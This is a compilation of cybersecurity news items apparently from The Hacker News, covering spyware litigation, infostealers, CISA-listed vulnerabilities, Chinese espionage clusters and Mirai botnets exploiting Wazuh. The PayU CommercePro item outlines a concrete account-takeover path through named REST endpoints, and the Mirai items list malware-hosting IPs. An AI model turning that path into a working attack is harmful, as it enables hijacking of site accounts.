• NSO Group Appeals $168 Million Damages to WhatsApp — Spyware vendor NSO Group has appealed a jury’s decision requiring it to pay about $168 million in damages to WhatsApp, saying the award is unlawful. The order was announced last month, more than five years after a lawsuit was filed over NSO Group’s alleged role in facilitating government spying on 1,400 mobile devices belonging to journalists, human rights activists, and political dissidents. According to NSO Group, WhatsApp should not be awarded more than $1.77 million. “The most plausible explanation for the oddly specific amount of the punitive damages award is that the jury chose that amount in an attempt to bankrupt NSO,” the Israeli company’s filing said. “The jury’s award comes close to wiping out all of NSO’s current ‘assets.’”
• Mozilla Debuts New System to Flag Cryptocurrency Drainer Add-ons — Mozilla said it’s developed an “early detection system” to detect and block scam crypto wallet extensions before they gain popularity among users and are used to steal users’ assets by tricking them into entering their credentials. “The first layer of defense involves automated indicators that determine a risk profile for wallet extensions submitted to AMO [addons.mozilla.org],” Mozilla said. “If a wallet extension reaches a certain risk threshold, human reviewers are alerted to take a deeper look. If found to be malicious, the scam extensions are blocked immediately.”
• iPhone Zero-Click Campaign Targets Users in Europe and the U.S. — Mobile research company iVerify revealed that it found evidence of anomalous activity on iPhones belonging to individuals affiliated with political campaigns, media organizations, A.I. companies, and governments operating in the European Union and the United States. It said it detected “exceedingly rare crashes” that are traditionally associated with sophisticated zero-click attacks via iMessage using a previously undocumented vulnerability in the “imagent” process to carry out post-exploitation actions. The vulnerability has been codenamed NICKNAME. The issue, observed in iOS versions up to 18.1.1, was patched in version 18.3.1 released in January 2025. “The bug involves a race condition in how iOS processes ‘Nickname Updates,’ the feature that allows users to share personalized contact information with their iMessage contact,” iVerify said. It’s said that the shortcoming was exploited in targeted attacks as recently as March 2025, prompting Apple to send a threat notification to at least one device belonging to a senior government official in the E.U. on which the crash was observed. In total, a total of six devices are believed to have been targeted by the unknown threat actor, two of which exhibited “clear signs of successful exploitation.” What makes the activity notable is that all the identified victims were previously targeted by the China-linked Salt Typhoon hacking group. In a statement shared with Axios, Apple acknowledged the fix, but disputed that it was ever used in a malicious context. It described it as a “conventional software bug that we identified and fixed in iOS 18.3” and that “iVerify has not responded with meaningful technical evidence supporting their claims, and we are not currently aware of any credible indication that the bug points to an exploitation attempt or active attack.”
• South Korea Targeted by ViperSoftX to Steal Crypto — Threat hunters have disclosed a new malware campaign that employs cracked software or key generators for legitimate software as lures to distribute a known stealer malware called ViperSoftX, alongside other malware families such as Quasar RAT, PureCrypter, PureHVNC, and a cryptocurrency clipper. “The ViperSoftX threat actor installs various PowerShell scripts in infected systems and uses them to download additional payloads,” AhnLab said. “This allows them to receive commands from the threat actor and perform various malicious behaviors.”

• U.S. State Department Offers $10M for Info About RedLine Developers — The U.S. State Department has announced rewards of up to $10 million for information on individuals affiliated with the RedLine information stealer, which suffered a law enforcement crackdown in October 2024. This could include foreign government-linked associates of Maxim Alexandrovich Rudometov, or their malicious cyber activities, or foreign government-linked use of the stealer. Rudometov was charged by the U.S. Justice Department last year for his alleged role as the developer and for marketing the malware-as-a-service (MaaS) on underground forums such as Russian Market, which has emerged as one of the most popular platforms for buying and selling credentials stolen by information stealer malware. Also known by the aliases, “dendimirror,” “alinchok,” “ghackihg,” “makc1901,” “navi_ghacking,” and “bloodzz.fenix,” Rudometov is believed to have fled from the Luhansk region of Ukraine where he was born to Krasnodar, Russia, following the Russian invasion of Ukraine in February 2022. The development comes weeks after the disruption of another notorious information stealer named Lumma last month by law enforcement and private-sector companies. According to ReliaQuest, Lumma accounted for nearly 92% of Russian Market credential log alerts in Q4 2024, putting it way ahead of its peers RedLine, StealC, Raccoon, Vidar, RisePro, and a new stealer referred to as Acreed. “In Q1 2025, Acreed surpassed every established infostealer in terms of Russian Market alert attribution, ranking second only to giant Lumma,” the company said. “Since the law enforcement takedown of Lumma in mid-May 2025, Acreed is perfectly positioned to rapidly gain traction as cybercriminals seek alternatives.”
• Apple Allegedly Gave Governments Data on 1000s of Push Notifications — Apple provided governments around the world with data related to thousands of push notifications sent to its devices, according to a report published by 404 Media. The data for the first time puts a concrete figure on how many requests governments around the world are making for push notification data from Apple (and Google). The practice first came to light in late 2023 when Senator Ron Wyden sent a letter to the U.S. Department of Justice, demanding more transparency into the practice. “The data these two companies receive includes metadata, detailing which app received a notification and when, as well as the phone and associated Apple or Google account to which that notification was intended to be delivered,” the letter read. “In certain instances, they also might also receive unencrypted content, which could range from backend directives for the app to the actual text displayed to a user in an app notification.”
• China Accuses Taiwan of Running 5 APT Groups with U.S. Help — China’s National Computer Virus Emergency Response Center (CVERC) has accused Taiwan’s Democratic Progressive Party (DPP) of sponsoring five advanced persistent threat (APT) groups to conduct cyber espionage attacks against government and public service entities, research institutions, universities, defense technology and industry entities, and foreign affairs agencies located in mainland china. “Their primary goal is to steal and sell sensitive intelligence, including important diplomatic policies, defense technology, cutting-edge scientific achievements, and economic data, to anti-China forces abroad,” CVERC claimed in a report titled Operation Futile. “They even attempt to disrupt social order and create chaos.” The groups, overseen by Taiwan’s Information, Communications and Electronic Force Command (ICEFOM), include APT-C-01 (aka Poison Vine or GreenSpot), APT-C-62 (aka Viola Tricolor), APT-C-64 (aka Anonymous 64), APT-C-65 (aka Neon Pothos), and APT-C-67 (aka Ursa). It also claimed that APT-C-67’s campaigns are geared towards collecting geographic intelligence, while stating APT-C-01 has “close ties” with the U.S. Cyber Command and that it focuses on “hunt forward” operations. The report coincided with China issuing warrants for 20 Taiwanese people that it said carried out hacking missions in the Chinese mainland on behalf of the island’s ruling party.
• Colombian Cyber Criminals Linked to Vehicle Insurance Scams — Cybercriminals from Colombia have been attributed to a scam that involves creating a network of over 100 fake websites to deceive users seeking damage-precautionary and mandatory vehicle insurance. The intent is to lend the sites a veneer of legitimacy, exploit users’ trust, and convince them to make payments to “activate” their insurance. The scheme employs ads on Facebook, urging users to engage with the threat actors on WhatsApp. “The scammers redirect them to a fake website posing as a legitimate car insurance provider,” Group-IB said. “The site nudges users to enter their vehicle registration number, initiating a process that feels remarkably authentic. The scam’s effectiveness lies in validating the vehicle’s insurance status. The site denies the purchase if the insurance is still active, reinforcing its credibility as a legitimate service. However, if the insurance has expired, the site displays accurate vehicle details, making it almost impossible for users to suspect foul play.” It’s believed that the threat actors extract the vehicle status from public databases and government sites.
• German Authorities Dox Leader of TrickBot — Germany’s Federal Criminal Police Office (aka Bundeskriminalamt or BKA) has outed Russian national Vitaly Nikolaevich Kovalev as the founder and leader of the TrickBot (aka Wizard Spider) cybercrime gang. Kovalev was recently added to the E.U. Most Wanted list in connection with a law enforcement operation that led to the takedown of about 300 servers worldwide and neutralization of 650 domains last month. The development comes as a mysterious leaker calling themselves GangExposed revealed the key figures behind the Conti and Trickbot ransomware crews, including Conti’s lead negotiator Arkady Valentinovich Bondarenko. In a statement with The Register, the lecturer said the actions are part of their “fight against an organized society of criminals known worldwide.”

🎥 Cybersecurity Webinars

• Hackers Are Hiding in Trusted Sites — Learn to Spot LOTS Attacks: Hackers aren’t breaking in—they’re blending in. In this live webinar, Zscaler’s top threat hunters will show how attackers are hiding inside trusted sites and tools to stay invisible. You’ll hear real stories from the front lines, learn what threats are trending right now, and get clear, practical tips to spot and stop stealth attacks before they spread. If you care about catching what your security tools are missing, don’t miss this.
• Every AI Agent Has a Secret Identity — Learn How to Find It Before Attackers Do: AI agents are reshaping how businesses operate—but behind every agent is a hidden identity risk. From service accounts to API keys, these Non-Human Identities (NHIs) have deep access yet often go unmanaged and unmonitored. In this webinar, you’ll uncover how attackers are targeting these invisible identities and learn practical steps to secure them before they become your biggest blind spot.

🔧 Cybersecurity Tools

• InterceptSuite: A tool that intercepts and inspects encrypted traffic from any app—not just web browsers. Built for deep visibility into TLS traffic across protocols, it gives security pros the power to analyze what traditional HTTP-only tools can’t see.
• Malware Detection System A multi-layered system that detects malicious websites using static analysis, dynamic behavior monitoring, and threat intelligence APIs. It flags threats like phishing, malware, obfuscated scripts, and hidden content for real-time, accurate detection.

Disclaimer: These newly released tools are for educational use only and haven’t been fully audited. Use at your own risk—review the code, test safely, and apply proper safeguards.

🔒 Tip of the Week

Block Malware Tactics Before They Start — Turn On ASR Rules → Most modern malware doesn’t rely on viruses—it abuses trusted tools like Word, Excel, and PowerShell to silently run in the background. Microsoft Defender’s built-in Attack Surface Reduction (ASR) rules stop these attacks by blocking dangerous actions like macros launching scripts or unknown apps accessing sensitive system parts.

Here’s how you can enable ASR protection in minutes:

Home & Power Users: Download ConfigureDefender — a safe, free tool that lets you enable all key ASR rules with just a few clicks. Open the app, choose the “High” or “Max” profile, and click “Apply Settings”. That’s it—your system is now protected against many common malware techniques.

Advanced Users or IT Admins: Use this PowerShell command to enable a critical ASR rule:

Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled

This one blocks Office apps from launching child processes—a common trick in ransomware delivery.

ASR rules don’t just block known malware—they shut down entire categories of risky behavior. They’re free, lightweight, and already built into Windows 10/11 Pro or Enterprise. Turning them on can prevent threats your antivirus may never catch.

Conclusion

This week’s takeaways are a reminder: threats rarely knock—they slip in. Every missed patch, strange behavior, or failed control is a step closer to something worse. If anything here hits close to home, don’t delay the fix. The next breach is often just a mistake left unchecked.

Jun 09, 2025The Hacker News

You don’t need a rogue employee to suffer a breach.

All it takes is a free trial that someone forgot to cancel. An AI-powered note-taker quietly syncing with your Google Drive. A personal Gmail account tied to a business-critical tool. That’s shadow IT. And today, it’s not just about unsanctioned apps, but also dormant accounts, unmanaged identities, over-permissioned SaaS tools, and orphaned access. Most of it slips past even the most mature security solutions.

Think your CASB or IdP covers this? It doesn’t.

They weren’t built to catch what’s happening inside SaaS: OAuth sprawl, shadow admins, GenAI access, or apps created directly in platforms like Google Workspace or Slack. Shadow IT is no longer a visibility issue – it’s a full-blown attack surface.

Wing Security helps security teams uncover these risks before they become incidents.

Here are 5 real-world examples of shadow IT that could be quietly bleeding your data.

1. Dormant access you can’t see, that attackers love to exploit

• The risk: Employees sign up for tools using just a username and password, without SSO or centralized visibility. Over time, they stop using the apps, but access stays, and worse, it is unmanaged.
• The impact: These zombie accounts become invisible entry points into your environment. You can’t enforce MFA, monitor usage, or revoke access during offboarding.
• Example: CISA and global cyber agencies issued a joint advisory warning in 2024 that Russian state-sponsored group APT29 (part of the SVR) actively targets dormant accounts to gain access to enterprise and government systems. These accounts often serve as ideal footholds since they go unnoticed, lack MFA, and remain accessible long after they’re no longer in use.

2. Generative AI quietly reading your emails, files, and strategy

• The risk: SaaS apps powered by Generative AI usually request broad OAuth permissions with full access to read inboxes, files, calendars, and chats.
• The impact: These SaaS apps often grant more access than required, exfiltrate sensitive data to third parties with unclear data retention and model training policies. Once access is granted, there’s no way to monitor how your data is stored, who has access internally, or what happens if the vendor is breached or misconfigures access.
• Example: In 2024, DeepSeek accidentally exposed internal LLM training files containing sensitive data due to a misconfigured storage bucket, highlighting the risk of giving third-party GenAI tools broad access without oversight around data security.

3. Former employees still hold admin access, months after leaving

• The risk: When employees onboard new SaaS tools (especially outside your IdP), they often are the sole admin. Even after they leave the company, their access remains.
• The impact: These accounts can have persistent, privileged access to company tools, files, or environments, posing a long-term insider risk.
• Real-life example: A contractor set up a time-tracking app and linked it to the company’s HR system. Months after their contract ended, they still had admin access to employee logs.

4. Business-critical apps tied to personal accounts you don’t control

• The risk: Employees sometimes use their personal Gmail, Apple ID, or other unmanaged accounts to sign up for business apps like Figma, Notion, or even Google Drive.
• The impact: These accounts exist entirely outside of IT visibility. If they get compromised, you can’t revoke access or enforce security policies.
• Example: In the 2023 Okta customer support breach, hackers exploited a service account without MFA that had access to Okta’s support system. The account was active, unmonitored, and not tied to a specific person. Even companies with mature identity systems can miss these blind spots.

5. Shadow SaaS with app-to-app connectivity to your crown jewels

• The risk: Employees connect unsanctioned SaaS apps directly to trusted platforms like Google Workspace, Salesforce, or Slack—without IT involvement or review. These app-to-app connections often request broad API access and stay active long after use.
• The impact: These integrations create hidden pathways into critical systems. If compromised, they can enable lateral movement, allowing attackers to pivot across apps, exfiltrate data, or maintain persistence without triggering traditional alerts.
• Example: A product manager connected a roadmap tool to Jira and Google Drive. The integration requested broad access but was forgotten after the project ended. When the vendor was later breached, attackers used the lingering connection to pull files from Drive and pivot into Jira, accessing internal credentials and escalation paths. This type of lateral movement was seen in the 2024 Microsoft breach by Midnight Blizzard, where attackers leveraged a legacy OAuth app with mailbox access to evade detection and maintain persistent access to internal systems.

What are you doing about it?

Shadow IT isn’t just a governance problem—it’s a real security gap. And the longer it goes unnoticed, the bigger the risk and the more exposed your SaaS environment becomes.

Wing Security automatically discovers SaaS apps, users, and integrations—mapping human and non-human identities, permissions, and MFA status—without agents or proxies. Once the unknown becomes known, Wing delivers multi-layered SaaS security in one platform, unifying misconfigurations, identity threats, and SaaS risks into a single source of truth. By correlating events across apps and identities, Wing cuts through the noise, prioritizes what matters, and enables proactive, continuous security.

👉 Get a demo and take control of your SaaS environment – before hackers do.

Jun 10, 2025Ravie LakshmananVulnerability / Cyber Attacks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added two critical security flaws impacting Erlang/Open Telecom Platform (OTP) SSH and Roundcube to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.

The vulnerabilities in question are listed below –

• CVE-2025-32433 (CVSS score: 10.0) – A missing authentication for a critical function vulnerability in the Erlang/OTP SSH server that could allow an attacker to execute arbitrary commands without valid credentials, potentially leading to unauthenticated remote code execution. (Fixed in April 2025 in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20)
• CVE-2024-42009 (CVSS score: 9.3) – A cross-site scripting (XSS) vulnerability in RoundCube Webmail that could allow a remote attacker to steal and send emails of a victim via a crafted email message by taking advantage of a desanitization issue in program/actions/mail/show.php. (Fixed in August 2024 in versions 1.6.8 and 1.5.8)

There are currently no details on how the two vulnerabilities are exploited in the wild, and by whom. Last month, ESET revealed that the Russia-linked threat actor known as APT28 exploited several XSS flaws in Roundcube, Horde, MDaemon, and Zimbra to target governmental entities and defense companies in Eastern Europe. It’s not clear if the abuse of CVE-2024-42009 is related to this activity or something else.

According to data from Censys, there are 340 exposed Erlang servers, although it bears noting that not all instances are necessarily susceptible to the flaw. The public disclosure of CVE-2025-32433 has been quickly followed by the release of several proof-of-concept (PoC) exploits for it.

In light of active exploitation, Federal Civilian Executive Branch (FCEB) agencies are required to apply the necessary fixes by June 30, 2025, for optimal protection.

The development comes as Patchstack flagged an unpatched account takeover vulnerability in the PayU CommercePro plugin for WordPress (CVE-2025-31022, CVSS score: 9.8) that enables an attacker to seize control of any user of a site without any authentication.

This can have serious consequences when the attacker is able to hijack an administrator account, permitting them to take over the site and perform malicious actions. The vulnerability affects versions 3.8.5 and before. The plugin has over 5,000 active installations.

The problem has to do with a function called “update_cart_data(),” which, in turn, is invoked from an endpoint named “/payu/v1/get-shipping-cost” that checks if a provided email address exists, and if so, processes the e-commerce order for checkout.

But because the endpoint checks for a valid token linked to a hard-coded email address (“commerce.pro@payu[.]in”) and there exists another REST API to generate an authentication token for a given email (“/payu/v1/generate-user-token”), an attacker could exploit this behavior to obtain the token corresponding to “commerce.pro@payu[.]in” and send a request to “/payu/v1/get-shipping-cost” to hijack any account.

Users are advised to deactivate and delete the plugin until a patch for the vulnerability is made available.

“It is necessary to ensure that the unauthenticated REST API endpoints are not overly permissive and provide more access to the users,” Patchstack said. “Also, hard-coding sensitive or dynamic information such as email addresses to use it for other cases inside the codebase is not recommended.”

Over 2 Million Roundcube Webmail Instances Found Online

Attack surface management platform Censys has revealed that it found 2,473,116 exposed Roundcube Webmail instances online, with a majority of them located in Europe and North America.

Jun 09, 2025Ravie LakshmananGovernment Security / Cyber Espionage

The reconnaissance activity targeting American cybersecurity company SentinelOne was part of a broader set of partially-related intrusions into several targets between July 2024 and March 2025.

“The victimology includes a South Asian government entity, a European media organization, and more than 70 organizations across a wide range of sectors,” SentinelOne security researchers Aleksandar Milenkoski and Tom Hegel said in a report published today.

Some of the targeted sectors include manufacturing, government, finance, telecommunications, and research. Also present among the victims was an IT services and logistics company that was managing hardware logistics for SentinelOne employees at the time of the breach in early 2025.

The malicious activity has been attributed with high confidence to China-nexus threat actors, with some of the attacks tied to a threat cluster dubbed PurpleHaze, which, in turn, overlaps with Chinese cyber espionage groups publicly reported as APT15 and UNC5174.

In late April 2024, SentinelOne first disclosed PurpleHaze-related reconnaissance activity targeting some of its servers that were deliberately accessible over the internet by “virtue of their functionality.”

“The threat actor’s activities were limited to mapping and evaluating the availability of select internet-facing servers, likely in preparation for potential future actions,” the researchers said.

It’s currently not known if the attackers’ intent was to just target the IT logistics organization or if they planned to expand their focus to downstream organizations as well. Further investigation into the attacks has uncovered six different activity clusters (named to A to F) that date back to June 2024 with the compromise of an unnamed South Asian government entity.

The clusters are listed below –

• Activity A: An intrusion into a South Asian government entity (June 2024)
• Activity B: A set of intrusions targeting organizations globally (Between July 2024 and March 2025)
• Activity C: An intrusion into an IT services and logistics company (at the beginning of 2025)
• Activity D: An intrusion into the same South Asian government entity compromised (October 2024)
• Activity E: Reconnaissance activity targeting SentinelOne servers (October 2024)
• Activity F: An intrusion into a leading European media organization (late September 2024)

The June 2024 attack against the government entity, as previously detailed by SentinelOne, is said to have led to the deployment of ShadowPad that’s obfuscated using ScatterBrain. The ShadowPad artifacts and infrastructure overlap with recent ShadowPad campaigns that have delivered a ransomware family codenamed NailaoLocker following the exploitation of Check Point gateway devices.

Subsequently in October 2024, the same organization was targeted to drop a Go-based reverse shell dubbed GoReShell that uses SSH to connect to an infected host. The same backdoor, SentinelOne noted, has been used in connection with a September 2024 attack aimed at a leading European media organization.

Also common to these two activity clusters is the use of tools developed by a team of IT security experts who go by the name The Hacker’s Choice (THC). The development marks the first time THC’s software programs have been abused by state-sponsored actors.

SentinelOne has attributed Activity F to a China-nexus actor with loose affiliations to an “initial access broker” tracked by Google Mandiant under the name UNC5174 (aka Uteus or Uetus). It’s worth noting that the threat group was recently linked to the active exploitation of SAP NetWeaver flaws to deliver GOREVERSE, a variant of GoReShell. The cybersecurity company is collectively tracking Activity D, E, and F as PurpleHaze.

“The threat actor leveraged ORB [operational relay box] network infrastructure, which we assess to be operated from China, and exploited the CVE-2024-8963 vulnerability together with CVE-2024-8190 to establish an initial foothold, a few days before the vulnerabilities were publicly disclosed,” the researchers said. “After compromising these systems, UNC5174 is suspected of transferring access to other threat actors.”

A now-patched critical security flaw in the Wazur Server is being exploited by threat actors to drop two different Mirai botnet variants and use them to conduct distributed denial-of-service (DDoS) attacks.

Akamai, which first discovered the exploitation efforts in late March 2025, said the malicious campaign targets CVE-2025-24016 (CVSS score: 9.9), an unsafe deserialization vulnerability that allows for remote code execution on Wazuh servers.

The security defect, which affects all versions of the server software including and above 4.4.0, was addressed in February 2025 with the release of 4.9.1. A proof-of-concept (PoC) exploit was publicly disclosed around the same time the patches were released.

The problem is rooted in the Wazuh API, where parameters in the DistributedAPI are serialized as JSON and deserialized using “as_wazuh_object” in the framework/wazuh/core/cluster/common.py file. A threat actor could weaponize the vulnerability by injecting malicious JSON payloads to execute arbitrary Python code remotely.

The web infrastructure company said it discovered attempts by two different botnets to exploit CVE-2025-24016 merely weeks after public disclosure of the flaw and the release of the PoC. The attacks were registered in early March and May 2025.

“This is the latest example of the ever-shrinking time-to-exploit timelines that botnet operators have adopted for newly published CVEs,” security researchers Kyle Lefton and Daniel Messing said in a report shared with The Hacker News.

In the first instance, a successful exploit paves the way for the execution of a shell script that serves as a downloader for the Mirai botnet payload from an external server (“176.65.134[.]62”) for different architectures. It’s assessed that the malware samples are variants of LZRD Mirai, which has been around since 2023.

It’s worth noting that LZRD was also deployed recently in attacks exploiting GeoVision end-of-life (EoL) Internet of Things (IoT) devices. However, Akamai told The Hacker News that there is no evidence that these two activity clusters are the work of the same threat actor given that LZRD is used by myriad botnet operators.

Further infrastructure analysis of “176.65.134[.]62” and its associated domains have led to the discovery of other Mirai botnet versions, including LZRD variants named “neon” and “vision,” and an updated version of V3G4.

Some of the other security flaws exploited by the botnet include flaws in Hadoop YARN, TP-Link Archer AX21 (CVE-2023-1389), and a remote code execution bug in ZTE ZXV10 H108L routers.

The second botnet to abuse CVE-2025-24016 employs a similar strategy of using a malicious shell script to deliver another Mirai botnet variant referred to as Resbot (aka Resentual).

“One of the interesting things that we noticed about this botnet was the associated language. It was using a variety of domains to spread the malware that all had Italian nomenclature,” the researchers said. “The linguistic naming conventions could indicate a campaign to target devices owned and run by Italian-speaking users in particular.”

Besides attempting to spread via FTP over port 21 and conducting telnet scanning, the botnet has been found to leverage a wide range of exploits targeting Huawei HG532 router (CVE-2017-17215), Realtek SDK (CVE-2014-8361), and TrueOnline ZyXEL P660HN-T v1 router (CVE-2017-18368).

“The propagation of Mirai continues relatively unabated, as it remains rather straightforward to repurpose and reuse old source code to set up or create new botnets,” the researchers said. “And botnet operators can often find success with simply leveraging newly published exploits.”

CVE-2025-24016 is far from the only vulnerability to be abused by Mirai botnet variants. In recent attacks, threat actors have also taken advantage of CVE-2024-3721, a medium-severity command injection vulnerability affecting TBK DVR-4104 and DVR-4216 digital video recording devices, to enlist them into the botnet.

The vulnerability is used to trigger the execution of a shell script that’s responsible for downloading the Mirai botnet from a remote server (“42.112.26[.]36”) and executing it, but not before checking if it’s currently running inside a virtual machine or QEMU.

Russian cybersecurity company Kaspersky said the infections are concentrated around China, India, Egypt, Ukraine, Russia, Turkey, and Brazil, adding it identified over 50,000 exposed DVR devices online.

“Exploiting known security flaws in IoT devices and servers that haven’t been patched, along with the widespread use of malware targeting Linux-based systems, leads to a significant number of bots constantly searching the internet for devices to infect,” security researcher Anderson Leite said.

The disclosure comes as China, India, Taiwan, Singapore, Japan, Malaysia, Hong Kong, Indonesia, South Korea, and Bangladesh have emerged as the most targeted countries in the APAC region in the first quarter of 2025, according to statistics shared by StormWall.

“API floods and carpet bombing are growing faster than traditional volumetric TCP/UDP attacks, pushing companies to adopt smarter, more flexible defenses,” the company said. “At the same time, rising geopolitical tensions are driving a surge in attacks on government systems and Taiwan – highlighting increased activity from hacktivists and state-sponsored threat actors.”

It also follows an advisory from the U.S. Federal Bureau of Investigation (FBI) that the BADBOX 2.0 botnet has infected millions of internet-connected devices, most of which are manufactured in China, in order to turn them into residential proxies to facilitate criminal activity.

“Cyber criminals gain unauthorized access to home networks by either configuring the product with malicious software prior to the user’s purchase or infecting the device as it downloads required applications that contain backdoors, usually during the set-up process,” the FBI said.

“The BADBOX 2.0 botnet consists of millions of infected devices and maintains numerous backdoors to proxy services that cyber criminal actors exploit by either selling or providing free access to compromised home networks to be used for various criminal activity.”

Update

Wazuh, in an advisory released on June 11, 2025, said CVE-2025-24016 was fixed in October 2024 with version 4.9.1 and that successfully exploiting it requires an attacker to be in possession of valid administrative API credentials and access to the Wazuh server API.

“As such, the likelihood of exploitation is low, and the overall risk is limited,” Wazuh said, adding the flaw has not impacted any of its customers.

(The story was updated after publication to include information shared by Wazuh.)